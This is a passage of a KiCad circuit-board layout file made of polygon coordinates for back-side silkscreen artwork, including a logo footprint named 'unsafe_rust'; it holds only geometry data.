(xy 19.157706 -0.795738) (xy 19.3328 -0.889336) (xy 19.424091 -0.963058) (xy 19.431 -0.981548)
(xy 19.37669 -1.04922) (xy 19.238445 -1.131118) (xy 19.141755 -1.172709) (xy 18.875624 -1.316124)
(xy 18.583983 -1.540459) (xy 18.300525 -1.81428) (xy 18.058943 -2.106149) (xy 17.936912 -2.296828)
(xy 17.791596 -2.677134) (xy 17.756077 -3.097034) (xy 17.830129 -3.566704) (xy 17.903565 -3.81)
(xy 18.0813 -4.219852) (xy 18.332469 -4.649616) (xy 18.635758 -5.07283) (xy 18.96985 -5.46303)
(xy 19.313429 -5.793753) (xy 19.64518 -6.038536) (xy 19.742394 -6.092885) (xy 19.908575 -6.163769)
(xy 20.057703 -6.185089) (xy 20.211297 -6.148212) (xy 20.390876 -6.044507) (xy 20.617959 -5.86534)
(xy 20.873265 -5.639223) (xy 21.138488 -5.40169) (xy 21.32871 -5.242521) (xy 21.460413 -5.151992)
(xy 21.550081 -5.12038) (xy 21.614198 -5.13796) (xy 21.65557 -5.177745) (xy 21.767781 -5.404731)
(xy 21.813026 -5.717491) (xy 21.797807 -6.098201) (xy 21.728621 -6.529038) (xy 21.611968 -6.99218)
(xy 21.454346 -7.469804) (xy 21.262256 -7.944088) (xy 21.042195 -8.397207) (xy 20.800663 -8.81134)
(xy 20.544159 -9.168664) (xy 20.279182 -9.451356) (xy 20.03162 -9.631234) (xy 19.720145 -9.753512)
(xy 19.317331 -9.837837) (xy 18.853904 -9.881293) (xy 18.360597 -9.880968) (xy 17.878249 -9.835431)
(xy 17.318477 -9.712295) (xy 16.845274 -9.511666) (xy 16.438191 -9.220108) (xy 16.076779 -8.824184)
(xy 15.859485 -8.509) (xy 15.53403 -7.882496) (xy 15.28614 -7.176992) (xy 15.218685 -6.873875)
(xy 17.200976 -6.873875) (xy 17.226266 -7.11496) (xy 17.345364 -7.279344) (xy 17.544996 -7.35285)
(xy 17.649754 -7.353205) (xy 17.801084 -7.328723) (xy 17.863536 -7.266943) (xy 17.87525 -7.145625)
(xy 17.835767 -6.975859) (xy 17.7165 -6.876686) (xy 17.543155 -6.816443) (xy 17.371769 -6.7982)
(xy 17.244005 -6.822186) (xy 17.200976 -6.873875) (xy 15.218685 -6.873875) (xy 15.116466 -6.414545)
(xy 15.025654 -5.617211) (xy 15.014354 -4.807049) (xy 15.083214 -4.006115) (xy 15.232883 -3.236466)
(xy 15.464009 -2.520161) (xy 15.670189 -2.070691) (xy 15.956047 -1.621261) (xy 16.304046 -1.227367)
(xy 16.695989 -0.900656) (xy 17.11368 -0.652775) (xy 17.538921 -0.495369) (xy 17.953515 -0.440084)
(xy 18.186538 -0.460222)) (layer B.SilkS) (width 0.01))
)
(module silkscreens:unsafe_rust locked (layer B.Cu) (tedit 0) (tstamp 5EE0C401)
(at 67.89 61.31 170)
(attr virtual)
(fp_text reference G*** (at 0 0 350) (layer B.SilkS) hide
(effects (font (size 1.524 1.524) (thickness 0.3)) (justify mirror))
)
(fp_text value LOGO (at 0.75 0 350) (layer B.SilkS) hide
(effects (font (size 1.524 1.524) (thickness 0.3)) (justify mirror))
)
(fp_poly (pts (xy 11.049867 30.490883) (xy 11.170577 30.343542) (xy 11.250573 30.184006) (xy 11.312187 30.025933)
(xy 11.347973 29.870078) (xy 11.361813 29.67977) (xy 11.357588 29.418341) (xy 11.349768 29.246631)
(xy 11.331222 28.990829) (xy 11.299258 28.727321) (xy 11.250465 28.443286) (xy 11.181429 28.125904)
(xy 11.088739 27.762352) (xy 10.968983 27.33981) (xy 10.818748 26.845457) (xy 10.634622 26.266471)
(xy 10.413193 25.59003) (xy 10.230099 25.039487) (xy 9.98532 24.300246) (xy 9.780906 23.665372)
(xy 9.613375 23.120045) (xy 9.479243 22.649442) (xy 9.375028 22.238741) (xy 9.297247 21.873119)
(xy 9.242418 21.537755) (xy 9.207057 21.217827) (xy 9.187683 20.898511) (xy 9.180862 20.574)
(xy 9.182249 20.192219) (xy 9.193137 19.912193) (xy 9.215876 19.70888) (xy 9.252818 19.557236)
(xy 9.283684 19.478625) (xy 9.406833 19.293071) (xy 9.551309 19.232347) (xy 9.716668 19.296163)
(xy 9.902465 19.484229) (xy 10.108255 19.796257) (xy 10.285071 20.131028) (xy 10.46111 20.461457)
(xy 10.686212 20.830829) (xy 10.967858 21.249845) (xy 11.313527 21.729205) (xy 11.730702 22.27961)
(xy 12.226861 22.911762) (xy 12.24435 22.93374) (xy 12.763869 23.594888) (xy 13.204855 24.175952)
(xy 13.575493 24.689636) (xy 13.883965 25.148645) (xy 14.138455 25.565683) (xy 14.347145 25.953452)
(xy 14.51822 26.324657) (xy 14.65332 26.673434) (xy 14.794569 27.03683) (xy 14.945093 27.333698)
(xy 15.137073 27.622431) (xy 15.277384 27.805746) (xy 15.510009 28.079014) (xy 15.761011 28.339023)
(xy 16.009987 28.567984) (xy 16.236533 28.748104) (xy 16.420248 28.861594) (xy 16.52364 28.892461)
(xy 16.65411 28.835904) (xy 16.729472 28.670462) (xy 16.747643 28.402651) (xy 16.734634 28.23242)
(xy 16.632466 27.605669) (xy 16.460045 26.930157) (xy 16.213572 26.194531) (xy 15.889251 25.387438)
(xy 15.489736 24.511) (xy 15.312467 24.132177) (xy 15.150274 23.769893) (xy 15.013193 23.447807)
(xy 14.911261 23.189581) (xy 14.854515 23.018873) (xy 14.851424 23.006288) (xy 14.813135 22.805315)
(xy 14.813287 22.646115) (xy 14.857322 22.470367) (xy 14.916585 22.307788) (xy 15.010745 21.971939)
(xy 15.071407 21.539669) (xy 15.098604 21.006123) (xy 15.092367 20.366446) (xy 15.05273 19.615784)
(xy 14.979726 18.749283) (xy 14.942997 18.386306) (xy 14.903195 18.008361) (xy 15.333756 18.481556)
(xy 15.658644 18.859675) (xy 16.018222 19.315214) (xy 16.404155 19.834769) (xy 16.808107 20.404936)
(xy 17.221743 21.012311) (xy 17.636726 21.64349) (xy 18.044721 22.285069) (xy 18.437392 22.923644)
(xy 18.806403 23.545811) (xy 19.143419 24.138165) (xy 19.440104 24.687304) (xy 19.688123 25.179823)
(xy 19.879139 25.602317) (xy 20.004817 25.941383) (xy 20.031112 26.035) (xy 20.182957 26.475339)
(xy 20.401238 26.878351) (xy 20.668387 27.221165) (xy 20.966836 27.480913) (xy 21.25397 27.626864)
(xy 21.415728 27.665743) (xy 21.525692 27.639524) (xy 21.601539 27.581114) (xy 21.666637 27.508879)
(xy 21.702349 27.417118) (xy 21.713798 27.273483) (xy 21.706111 27.045629) (xy 21.700769 26.954854)
(xy 21.649548 26.558937) (xy 21.538978 26.0941) (xy 21.366428 25.552615) (xy 21.129267 24.926751)
(xy 20.824864 24.208777) (xy 20.588062 23.6855) (xy 20.348586 23.163652) (xy 20.158797 22.736555)
(xy 20.01345 22.384454) (xy 19.9073 22.087595) (xy 19.835101 21.826225) (xy 19.791609 21.580589)
(xy 19.771579 21.330933) (xy 19.769764 21.057502) (xy 19.780921 20.740542) (xy 19.784739 20.660043)
(xy 19.800747 20.290792) (xy 19.80571 20.016561) (xy 19.797383 19.805675) (xy 19.77352 19.626459)
(xy 19.731874 19.447239) (xy 19.687927 19.294793) (xy 19.549093 18.906295) (xy 19.347949 18.461404)
(xy 19.079712 17.951256) (xy 18.739603 17.366986) (xy 18.32284 16.699729) (xy 18.11751 16.383)
(xy 17.781651 15.864839) (xy 17.516481 15.443308) (xy 17.318912 15.111663) (xy 17.185855 14.86316)
(xy 17.114224 14.691057) (xy 17.10093 14.588608) (xy 17.142886 14.54907) (xy 17.237004 14.565701)
(xy 17.296656 14.590214) (xy 17.527151 14.730856) (xy 17.82379 14.970724) (xy 18.181162 15.304121)
(xy 18.593855 15.725349) (xy 19.056457 16.228712) (xy 19.563558 16.808513) (xy 20.109745 17.459054)
(xy 20.627173 18.096457) (xy 21.268862 18.888685) (xy 21.850738 19.585202) (xy 22.382492 20.196588)
(xy 22.873819 20.733425) (xy 23.334411 21.206291) (xy 23.773961 21.625769) (xy 24.202162 22.002437)
(xy 24.216837 22.014786) (xy 24.61316 22.332072) (xy 24.933975 22.552591) (xy 25.184351 22.677746)
(xy 25.369352 22.708938) (xy 25.494045 22.647569) (xy 25.563497 22.49504) (xy 25.578552 22.391606)
(xy 25.546359 22.073661) (xy 25.40479 21.717535) (xy 25.161528 21.334305) (xy 24.824254 20.935048)
(xy 24.400652 20.530841) (xy 24.136919 20.312996) (xy 23.975737 20.185611) (xy 23.83577 20.071833)
(xy 23.706674 19.960551) (xy 23.578105 19.840658) (xy 23.43972 19.701043) (xy 23.281174 19.530596)
(xy 23.092125 19.318208) (xy 22.862228 19.05277) (xy 22.581141 18.723171) (xy 22.238519 18.318303)
(xy 21.839904 17.84589) (xy 21.350402 17.261717) (xy 20.941945 16.765444) (xy 20.610145 16.351004)
(xy 20.35061 16.012329) (xy 20.158951 15.743351) (xy 20.030779 15.538004) (xy 19.961703 15.390221)
(xy 19.947334 15.293934) (xy 19.965749 15.255584) (xy 20.057909 15.246353) (xy 20.209549 15.316953)
(xy 20.3971 15.451131) (xy 20.596994 15.632635) (xy 20.740896 15.790115) (xy 21.011829 16.104418)
(xy 21.251092 16.36466) (xy 21.446389 16.558461) (xy 21.585421 16.67344) (xy 21.645144 16.700501)
(xy 21.7128 16.670197) (xy 21.705911 16.576528) (xy 21.621575 16.415355) (xy 21.456887 16.182542)
(xy 21.208942 15.87395) (xy 20.874837 15.485442) (xy 20.491091 15.05633) (xy 20.102773 14.621993)
(xy 19.715912 14.17836) (xy 19.339728 13.736938) (xy 18.983444 13.309232) (xy 18.65628 12.906749)
(xy 18.367459 12.540994) (xy 18.126203 12.223474) (xy 17.941733 11.965695) (xy 17.823271 11.779162)
(xy 17.780038 11.675382) (xy 17.78 11.673663) (xy 17.82608 11.621447) (xy 17.951931 11.644104)
(xy 18.138968 11.736164) (xy 18.263494 11.815985) (xy 18.531661 12.023473) (xy 18.863147 12.317564)
(xy 19.243869 12.684172) (xy 19.659748 13.10921) (xy 20.096699 13.578593) (xy 20.540642 14.078235)
(xy 20.639079 14.19225) (xy 20.916511 14.512742) (xy 21.182294 14.815051) (xy 21.419582 15.08038)
(xy 21.611533 15.289927) (xy 21.741303 15.424892) (xy 21.757153 15.440188) (xy 21.992775 15.645198)
(xy 22.227226 15.819243) (xy 22.432731 15.943827) (xy 22.581512 16.000451) (xy 22.600777 16.002001)
(xy 22.744459 16.03609) (xy 22.965061 16.128731) (xy 23.235572 16.265485) (xy 23.528983 16.431911)
(xy 23.818285 16.61357) (xy 24.053444 16.77862) (xy 24.755378 17.335518) (xy 25.401256 17.908846)
(xy 25.963243 18.473463) (xy 26.111196 18.63725) (xy 26.499962 19.122055) (xy 26.799536 19.602384)
(xy 27.021117 20.106286) (xy 27.175905 20.66181) (xy 27.275099 21.297006) (xy 27.305511 21.628529)
(xy 27.340348 22.006779) (xy 27.383861 22.2755) (xy 27.443838 22.452158) (xy 27.528069 22.55422)
(xy 27.644342 22.599154) (xy 27.741379 22.606) (xy 27.964604 22.547297) (xy 28.188129 22.38655)
(xy 28.390305 22.146803) (xy 28.549483 21.851103) (xy 28.607854 21.683656) (xy 28.672909 21.474711)
(xy 28.732597 21.315209) (xy 28.767881 21.248575) (xy 28.846102 21.215247) (xy 28.976407 21.239417)
(xy 29.17064 21.326398) (xy 29.440648 21.481507) (xy 29.798275 21.710058) (xy 29.802457 21.712814)
(xy 30.079011 21.892774) (xy 30.336372 22.056106) (xy 30.545712 22.184772) (xy 30.6778 22.260526)
(xy 30.817909 22.325941) (xy 30.895583 22.327464) (xy 30.958951 22.263691) (xy 30.967522 22.252074)
(xy 31.03467 22.141293) (xy 31.0515 22.089998) (xy 30.999017 21.908126) (xy 30.84705 21.668263)
(xy 30.603817 21.379709) (xy 30.277539 21.05177) (xy 29.876437 20.693746) (xy 29.65683 20.511578)
(xy 29.187762 20.11988) (xy 28.821179 19.787746) (xy 28.551138 19.508615) (xy 28.371694 19.275927)
(xy 28.276906 19.083123) (xy 28.257737 18.967385) (xy 28.3163 18.858821) (xy 28.473785 18.76561)
(xy 28.702189 18.698812) (xy 28.973508 18.669486) (xy 29.013326 18.669001) (xy 29.340059 18.645067)
(xy 29.550718 18.573813) (xy 29.644512 18.45606) (xy 29.620648 18.29263) (xy 29.523897 18.139093)
(xy 29.428738 18.049428) (xy 29.247615 17.905873) (xy 29.001074 17.723712) (xy 28.70966 17.518228)
(xy 28.472731 17.357147) (xy 28.007938 17.036918) (xy 27.651294 16.769835) (xy 27.397752 16.551466)
(xy 27.242264 16.377379) (xy 27.17978 16.243142) (xy 27.178 16.220469) (xy 27.234411 16.126475)
(xy 27.375678 16.054605) (xy 27.559854 16.019945) (xy 27.709948 16.029157) (xy 27.92509 16.098771)
(xy 28.210457 16.22916) (xy 28.535267 16.404111) (xy 28.868739 16.607413) (xy 29.083 16.752345)
(xy 29.625359 17.131596) (xy 30.080617 17.437398) (xy 30.460699 17.675817) (xy 30.777529 17.852922)
(xy 31.043034 17.974778) (xy 31.269137 18.047452) (xy 31.467764 18.077011) (xy 31.65084 18.069522)
(xy 31.66747 18.067162) (xy 31.872915 18.014578) (xy 32.045627 17.934722) (xy 32.074336 17.914234)
(xy 32.171407 17.781127) (xy 32.161855 17.622273) (xy 32.043173 17.435089) (xy 31.812852 17.216989)
(xy 31.468387 16.965387) (xy 31.007269 16.677699) (xy 30.708878 16.506433) (xy 29.857227 16.02046)
(xy 29.108435 15.573469) (xy 28.448189 15.155459) (xy 27.862173 14.756433) (xy 27.336073 14.366391)
(xy 26.855573 13.975333) (xy 26.40636 13.573261) (xy 26.133971 13.310785) (xy 25.603351 12.747759)
(xy 25.19003 12.224594) (xy 24.891744 11.738332) (xy 24.82536 11.601433) (xy 24.753943 11.390589)
(xy 24.713051 11.161791) (xy 24.705377 10.953779) (xy 24.73361 10.805292) (xy 24.76706 10.761977)
(xy 24.870221 10.764966) (xy 25.0668 10.835956) (xy 25.346467 10.969704) (xy 25.698891 11.160964)
(xy 26.113743 11.404489) (xy 26.484897 11.634218) (xy 26.974031 11.939397) (xy 27.367509 12.175497)
(xy 27.673652 12.346367) (xy 27.900777 12.455856) (xy 28.057203 12.507811) (xy 28.15125 12.506083)
(xy 28.191236 12.454519) (xy 28.194 12.424924) (xy 28.169536 12.338485) (xy 28.102428 12.159908)
(xy 28.002097 11.912889) (xy 27.877966 11.621126) (xy 27.83779 11.529088) (xy 27.667563 11.121728)
(xy 27.540523 10.776238) (xy 27.460003 10.504481) (xy 27.429332 10.318316) (xy 27.451841 10.229606)
(xy 27.471264 10.223738) (xy 27.576308 10.259277) (xy 27.748044 10.368292) (xy 27.992498 10.555317)
(xy 28.315694 10.824886) (xy 28.60675 11.078106) (xy 29.031731 11.438476) (xy 29.449427 11.766388)
(xy 29.844221 12.051303) (xy 30.200495 12.282686) (xy 30.502632 12.450001) (xy 30.735017 12.542711)
(xy 30.796547 12.555526) (xy 30.973913 12.563326) (xy 31.045289 12.523533) (xy 31.009175 12.433852)
(xy 30.864067 12.291987) (xy 30.608465 12.095641) (xy 30.400625 11.950169) (xy 29.778844 11.501452)
(xy 29.249692 11.064644) (xy 28.784267 10.614783) (xy 28.526489 10.331566) (xy 28.297106 10.049913)
(xy 28.108733 9.783742) (xy 27.973028 9.552728) (xy 27.901648 9.376546) (xy 27.903055 9.279406)
(xy 27.976295 9.254939) (xy 28.141579 9.274331) (xy 28.402556 9.338747) (xy 28.762872 9.449348)
(xy 29.226179 9.607297) (xy 29.796123 9.813759) (xy 30.476353 10.069897) (xy 30.929085 10.244087)
(xy 31.544847 10.480794) (xy 32.054328 10.671769) (xy 32.468632 10.819753) (xy 32.798865 10.927485)
(xy 33.056131 10.997705) (xy 33.251535 11.033152) (xy 33.396183 11.036567) (xy 33.501179 11.010688)
(xy 33.577628 10.958256) (xy 33.619649 10.907871) (xy 33.705838 10.692733) (xy 33.692917 10.426526)
(xy 33.579808 10.098204) (xy 33.530293 9.99415) (xy 33.28892 9.58622) (xy 32.966157 9.171311)
(xy 32.553354 8.740655) (xy 32.041858 8.28548) (xy 31.423017 7.797019) (xy 31.1981 7.630196)
(xy 30.897384 7.395643) (xy 30.647936 7.172672) (xy 30.465663 6.977449) (xy 30.366472 6.826143)
(xy 30.353 6.771271) (xy 30.412362 6.664279) (xy 30.576097 6.581244) (xy 30.822681 6.529439)
(xy 31.109459 6.515693) (xy 31.646469 6.585475) (xy 32.185081 6.778173) (xy 32.706519 7.079186)
(xy 32.998974 7.269563) (xy 33.28663 7.43485) (xy 33.588048 7.581964) (xy 33.921788 7.717821)
(xy 34.306411 7.849338) (xy 34.760477 7.983432) (xy 35.302547 8.12702) (xy 35.941 8.284567)
(xy 36.349283 8.38775) (xy 36.825687 8.515723) (xy 37.31758 8.653933) (xy 37.77233 8.787829)
(xy 37.87775 8.820067) (xy 38.326123 8.956656) (xy 38.668428 9.055498) (xy 38.919067 9.119032)
(xy 39.092445 9.149697) (xy 39.202967 9.149933) (xy 39.265038 9.122179) (xy 39.293062 9.068873)
(xy 39.294982 9.060059) (xy 39.259607 8.913068) (xy 39.104084 8.734679) (xy 38.830921 8.526426)
(xy 38.442627 8.28984) (xy 37.94171 8.026456) (xy 37.330679 7.737806) (xy 36.6395 7.436959)
(xy 35.961199 7.130484) (xy 35.341337 6.808262) (xy 34.789873 6.477576) (xy 34.316765 6.145712)
(xy 33.931973 5.819955) (xy 33.645457 5.50759) (xy 33.467175 5.215901) (xy 33.422608 5.083852)
(xy 33.359224 4.923214) (xy 33.237966 4.772494) (xy 33.041855 4.617355) (xy 32.753913 4.44346)
(xy 32.512 4.314881) (xy 32.233781 4.164609) (xy 31.974005 4.011528) (xy 31.769318 3.877843)
(xy 31.6865 3.814734) (xy 31.46425 3.624662) (xy 31.685634 3.622081) (xy 31.806205 3.641376)
(xy 32.027307 3.696968) (xy 32.329603 3.783186) (xy 32.69376 3.894359) (xy 33.100442 4.024816)
(xy 33.408729 4.1275) (xy 33.948116 4.307579) (xy 34.378516 4.445405) (xy 34.70982 4.543407)
(xy 34.951922 4.604015) (xy 35.114715 4.629656) (xy 35.208091 4.622759) (xy 35.241944 4.585754)
(xy 35.2425 4.577693) (xy 35.185181 4.504317) (xy 35.015185 4.380109) (xy 34.735449 4.206792)
(xy 34.348913 3.986087) (xy 33.858515 3.719716) (xy 33.267193 3.409401) (xy 33.108991 3.327757)
(xy 32.464597 2.991705) (xy 31.931564 2.70357) (xy 31.504974 2.460191) (xy 31.179911 2.258411)
(xy 30.951457 2.095071) (xy 30.814697 1.967012) (xy 30.764713 1.871076) (xy 30.774176 1.827867)
(xy 30.83468 1.761844) (xy 30.930001 1.720068) (xy 31.075465 1.702976) (xy 31.286401 1.711005)
(xy 31.578138 1.744593) (xy 31.966002 1.804179) (xy 32.370574 1.873455) (xy 32.975018 1.981799)
(xy 33.468199 2.075083) (xy 33.864512 2.156654) (xy 34.178356 2.229857) (xy 34.424125 2.298037)
(xy 34.616216 2.364539) (xy 34.761867 2.429092) (xy 34.96538 2.511667) (xy 35.22987 2.582818)
(xy 35.567859 2.644348) (xy 35.991871 2.698062) (xy 36.514431 2.745763) (xy 37.148061 2.789257)
(xy 37.340374 2.800545) (xy 37.754075 2.82099) (xy 38.22041 2.838738) (xy 38.723634 2.853676)
(xy 39.248006 2.865693) (xy 39.777781 2.874678) (xy 40.297217 2.880519) (xy 40.79057 2.883104)
(xy 41.242097 2.882322) (xy 41.636056 2.878062) (xy 41.956701 2.870211) (xy 42.188292 2.858658)
(xy 42.315084 2.843292) (xy 42.333051 2.835934) (xy 42.329796 2.761201) (xy 42.218128 2.651757)
(xy 42.00939 2.515168) (xy 41.714925 2.359001) (xy 41.402 2.214905) (xy 40.828205 1.957589)
(xy 40.361141 1.728604) (xy 39.986375 1.518219) (xy 39.689475 1.316704) (xy 39.456009 1.114327)
(xy 39.271545 0.901358) (xy 39.130088 0.683091) (xy 39.007289 0.483906) (xy 38.888394 0.319517)
(xy 38.822139 0.247153) (xy 38.698913 0.17877) (xy 38.478357 0.09156) (xy 38.187306 -0.006612)
(xy 37.852593 -0.107882) (xy 37.501053 -0.204383) (xy 37.159519 -0.288252) (xy 36.854825 -0.351623)
(xy 36.68851 -0.378194) (xy 36.474322 -0.402347) (xy 36.161235 -0.432256) (xy 35.777087 -0.46553)
(xy 35.349719 -0.49978) (xy 34.906968 -0.532614) (xy 34.81526 -0.539062) (xy 34.031014 -0.602132)
(xy 33.363623 -0.674908) (xy 32.80318 -0.759387) (xy 32.339774 -0.857564) (xy 31.963497 -0.971437)
(xy 31.664438 -1.103001) (xy 31.493544 -1.208248) (xy 31.35502 -1.350062) (xy 31.304502 -1.496519)
(xy 31.345378 -1.616637) (xy 31.44281 -1.672095) (xy 31.5926 -1.678794) (xy 31.851497 -1.652824)
(xy 32.206493 -1.5964) (xy 32.644581 -1.511732) (xy 33.152752 -1.401036) (xy 33.4645 -1.328164)
(xy 34.144215 -1.172765) (xy 34.716773 -1.059485) (xy 35.194956 -0.988683) (xy 35.591546 -0.960722)
(xy 35.919325 -0.975961) (xy 36.191073 -1.034763) (xy 36.419575 -1.137487) (xy 36.61761 -1.284496)
(xy 36.751169 -1.420991) (xy 36.90775 -1.648059) (xy 36.947446 -1.851679) (xy 36.87242 -2.052634)
(xy 36.823997 -2.120458) (xy 36.671419 -2.270847) (xy 36.457176 -2.402198) (xy 36.162403 -2.52309)
(xy 35.768236 -2.642104) (xy 35.558269 -2.696131) (xy 35.279555 -2.769645) (xy 35.042581 -2.840571)
(xy 34.877556 -2.899385) (xy 34.82042 -2.928743) (xy 34.740396 -3.041729) (xy 34.784479 -3.14744)
(xy 34.954024 -3.248618) (xy 34.98485 -3.26138) (xy 35.190138 -3.331103) (xy 35.435642 -3.389073)
(xy 35.737624 -3.437288) (xy 36.112351 -3.477744) (xy 36.576087 -3.512437) (xy 37.145096 -3.543365)
(xy 37.362429 -3.553246) (xy 37.76628 -3.573757) (xy 38.125789 -3.597472) (xy 38.421544 -3.622677)
(xy 38.634136 -3.647658) (xy 38.744156 -3.670703) (xy 38.753464 -3.676064) (xy 38.758262 -3.760359)
(xy 38.662641 -3.90879) (xy 38.586159 -3.997892) (xy 38.457171 -4.149302) (xy 38.372877 -4.264812)
(xy 38.354 -4.30575) (xy 38.388522 -4.395219) (xy 38.474896 -4.546048) (xy 38.587334 -4.719092)
(xy 38.700048 -4.87521) (xy 38.787249 -4.975255) (xy 38.803272 -4.987699) (xy 38.968307 -5.051788)
(xy 39.215736 -5.086601) (xy 39.556758 -5.092485) (xy 40.002573 -5.069789) (xy 40.385366 -5.036853)
(xy 41.050626 -4.983852) (xy 41.601098 -4.965672) (xy 42.044411 -4.983321) (xy 42.388193 -5.037809)
(xy 42.640072 -5.130146) (xy 42.807678 -5.26134) (xy 42.87426 -5.366203) (xy 42.898788 -5.552117)
(xy 42.799565 -5.724161) (xy 42.579412 -5.878885) (xy 42.385888 -5.963681) (xy 42.175911 -6.035662)
(xy 42.001969 -6.08374) (xy 41.923492 -6.09605) (xy 41.758728 -6.133287) (xy 41.526937 -6.233244)
(xy 41.259578 -6.378457) (xy 40.988111 -6.551464) (xy 40.743996 -6.734798) (xy 40.690695 -6.780404)
(xy 40.443434 -6.978708) (xy 40.225707 -7.100904) (xy 39.992195 -7.172722) (xy 39.842958 -7.193158)
(xy 39.58614 -7.215333) (xy 39.241125 -7.238124) (xy 38.8273 -7.260405) (xy 38.364049 -7.281054)
(xy 37.87076 -7.298946) (xy 37.75075 -7.302685) (xy 36.982766 -7.330144) (xy 36.327618 -7.363508)
(xy 35.771219 -7.404193) (xy 35.299484 -7.453622) (xy 34.898327 -7.513212) (xy 34.553663 -7.584383)
(xy 34.314608 -7.648961) (xy 34.046225 -7.752046) (xy 33.830154 -7.877295) (xy 33.692067 -8.007081)
(xy 33.655 -8.101792) (xy 33.714564 -8.211109) (xy 33.878989 -8.323163) (xy 34.126875 -8.427022)
(xy 34.436821 -8.511755) (xy 34.47184 -8.519046) (xy 34.736791 -8.555256) (xy 35.102439 -8.580639)
(xy 35.542953 -8.595271) (xy 36.032498 -8.599226) (xy 36.545243 -8.592581) (xy 37.055352 -8.57541)
(xy 37.536995 -8.547789) (xy 37.964336 -8.509793) (xy 37.973 -8.508833) (xy 38.406006 -8.46914)
(xy 38.869665 -8.441308) (xy 39.340921 -8.425308) (xy 39.796718 -8.421107) (xy 40.213998 -8.428675)
(xy 40.569705 -8.447981) (xy 40.840784 -8.478994) (xy 40.983054 -8.512882) (xy 41.209976 -8.626544)
(xy 41.319102 -8.751815) (xy 41.318623 -8.884294) (xy 41.21673 -9.019583) (xy 41.021612 -9.153281)
(xy 40.741463 -9.280988) (xy 40.384471 -9.398305) (xy 39.958828 -9.500832) (xy 39.472725 -9.584169)
(xy 38.934353 -9.643916) (xy 38.867603 -9.649217) (xy 38.266397 -9.71616) (xy 37.752279 -9.817398)
(xy 37.338 -9.949774) (xy 37.05225 -10.098915) (xy 36.596989 -10.368808) (xy 36.088018 -10.58354)
(xy 35.505952 -10.749171) (xy 34.831404 -10.87176) (xy 34.417 -10.922712) (xy 33.960564 -10.978565)
(xy 33.567344 -11.041591) (xy 33.251477 -11.108553) (xy 33.027099 -11.176213) (xy 32.908348 -11.241333)
(xy 32.893 -11.27173) (xy 32.955365 -11.403908) (xy 33.138111 -11.539249) (xy 33.434717 -11.675993)
(xy 33.838658 -11.812377) (xy 34.343412 -11.946638) (xy 34.942456 -12.077015) (xy 35.629268 -12.201746)
(xy 36.397324 -12.319069) (xy 37.11575 -12.412444) (xy 37.754738 -12.492829) (xy 38.277627 -12.566703)
(xy 38.695024 -12.636165) (xy 39.017539 -12.703312) (xy 39.255778 -12.770246) (xy 39.420351 -12.839065)
(xy 39.487706 -12.881795) (xy 39.603283 -13.034046) (xy 39.683071 -13.25698) (xy 39.713823 -13.496295)
(xy 39.68504 -13.690719) (xy 39.658678 -13.747492) (xy 39.617683 -13.792952) (xy 39.54692 -13.8299)
(xy 39.431253 -13.86114) (xy 39.255547 -13.889475) (xy 39.004667 -13.917707) (xy 38.663476 -13.948638)
(xy 38.21684 -13.985071) (xy 38.00475 -14.001854) (xy 37.354131 -14.053456) (xy 36.819002 -14.096702)
(xy 36.388203 -14.132667) (xy 36.050573 -14.162428) (xy 35.794954 -14.18706) (xy 35.610185 -14.20764)
(xy 35.485107 -14.225243) (xy 35.408559 -14.240945) (xy 35.369383 -14.255822) (xy 35.369178 -14.255948)
(xy 35.326086 -14.328707) (xy 35.406431 -14.415896) (xy 35.607549 -14.516863) (xy 35.926777 -14.630954)
(xy 36.361449 -14.757517) (xy 36.908902 -14.895898) (xy 37.566472 -15.045444) (xy 38.331496 -15.205503)
(xy 39.201308 -15.37542) (xy 40.173245 -15.554542) (xy 41.244644 -15.742218) (xy 41.8465 -15.844026)
(xy 42.59972 -15.979812) (xy 43.229451 -16.11531) (xy 43.739189 -16.252204) (xy 44.132429 -16.392178)
(xy 44.412668 -16.536916) (xy 44.5834 -16.688101) (xy 44.648122 -16.847417) (xy 44.610328 -17.016547)
(xy 44.529375 -17.136218) (xy 44.439864 -17.203815) (xy 44.286567 -17.264558) (xy 44.062855 -17.319034)
(xy 43.762102 -17.36783) (xy 43.377679 -17.411536) (xy 42.90296 -17.450737) (xy 42.331316 -17.486023)
(xy 41.65612 -17.517981) (xy 40.870745 -17.547198) (xy 39.968563 -17.574262) (xy 39.4335 -17.588115)
(xy 38.473989 -17.613551) (xy 37.633908 -17.639903) (xy 36.905683 -17.66791) (xy 36.281744 -17.698309)
(xy 35.754519 -17.731838) (xy 35.316438 -17.769235) (xy 34.959927 -17.811236) (xy 34.677417 -17.858581)
(xy 34.461336 -17.912006) (xy 34.304112 -17.972248) (xy 34.198174 -18.040047) (xy 34.143176 -18.103546)
(xy 34.097266 -18.282341) (xy 34.175885 -18.464035) (xy 34.376623 -18.647496) (xy 34.697075 -18.831596)
(xy 35.134832 -19.015204) (xy 35.687485 -19.197189) (xy 36.352628 -19.376421) (xy 37.127853 -19.55177)
(xy 37.30625 -19.588366) (xy 37.990717 -19.728751) (xy 38.559492 -19.850723) (xy 39.022158 -19.956724)
(xy 39.388299 -20.049197) (xy 39.667499 -20.130585) (xy 39.869341 -20.20333) (xy 40.003408 -20.269876)
(xy 40.01862 -20.279713) (xy 40.188136 -20.423104) (xy 40.239161 -20.555925) (xy 40.176543 -20.697896)
(xy 40.133689 -20.748057) (xy 40.045826 -20.828501) (xy 39.938783 -20.892892) (xy 39.798649 -20.942797)
(xy 39.611514 -20.979784) (xy 39.363467 -21.005418) (xy 39.040598 -21.021267) (xy 38.628998 -21.028898)
(xy 38.114756 -21.029878) (xy 37.6555 -21.027207) (xy 37.005177 -21.024771) (xy 36.463374 -21.029011)
(xy 36.011754 -21.040527) (xy 35.631983 -21.05992) (xy 35.305725 -21.087792) (xy 35.1155 -21.110496)
(xy 34.711742 -21.159119) (xy 34.327161 -21.192512) (xy 33.947379 -21.209409) (xy 33.558018 -21.208543)
(xy 33.144701 -21.188647) (xy 32.693048 -21.148454) (xy 32.188683 -21.086699) (xy 31.617227 -21.002115)
(xy 30.964303 -20.893434) (xy 30.215532 -20.759392) (xy 29.4005 -20.607059) (xy 28.314319 -20.404245)
(xy 27.350129 -20.230806) (xy 26.506418 -20.086525) (xy 25.781673 -19.971186) (xy 25.174379 -19.884572)
(xy 24.683025 -19.826465) (xy 24.306097 -19.796651) (xy 24.042082 -19.794911) (xy 23.894975 -19.818879)
(xy 23.850293 -19.854222) (xy 23.898633 -19.903916) (xy 24.053022 -19.980325) (xy 24.075484 -19.990212)
